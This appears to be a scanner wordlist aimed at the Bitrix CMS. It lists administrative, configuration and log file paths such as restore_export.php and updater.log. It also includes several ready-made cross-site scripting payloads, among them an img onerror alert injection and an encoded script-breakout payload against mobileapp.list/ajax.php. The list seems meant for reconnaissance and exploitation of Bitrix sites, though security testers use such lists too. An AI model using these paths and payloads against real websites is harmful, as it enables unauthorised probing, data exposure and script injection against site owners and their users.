/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>
/bitrix/admin/
/bitrix/components/bitrix/map.yandex.view/settings/settings.php
/?USER_FIELD_MANAGER=1
/bitrix/admin/restore_export.php
/bitrix/admin/tools_index.php
/bitrix/bitrix.php
/bitrix/modules/main/ajax_tools.php
/bitrix/php_interface/after_connect_d7.php
/bitrix/themes/.default/.description.php
/bitrix/components/bitrix/main.ui.selector/templates/.default/template.php
/bitrix/components/bitrix/forum.user.profile.edit/templates/.default/interface.php
/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=
/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E
/bitrix/modules/updater.log
/bitrix/modules/updater_partner.log
{{paths}}
